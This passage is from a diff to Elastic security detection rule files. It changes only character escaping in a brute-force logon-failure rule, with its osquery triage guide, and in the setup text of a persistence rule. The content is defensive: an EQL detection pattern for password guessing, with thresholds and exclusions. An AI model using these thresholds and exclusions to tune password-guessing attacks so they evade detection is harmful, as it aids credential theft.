or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. 
This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. 
More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json
index bae29e14546..0242a4940fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_7.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. 
This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. 
More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json
index 74246a92312..38991a4f6d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_8.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. 
This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. 
More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json
index d71ab475b46..620f66c1129 100644
--- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_102.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json
index f1c42ca4064..f55271267c5 100644
--- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_103.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json
index 867f27fb846..4bbd60080a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_104.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json
index b5b03d0099a..de2175ee676 100644
--- a/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/48d7f54d-c29e-4430-93a9-9db6b5892270_105.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
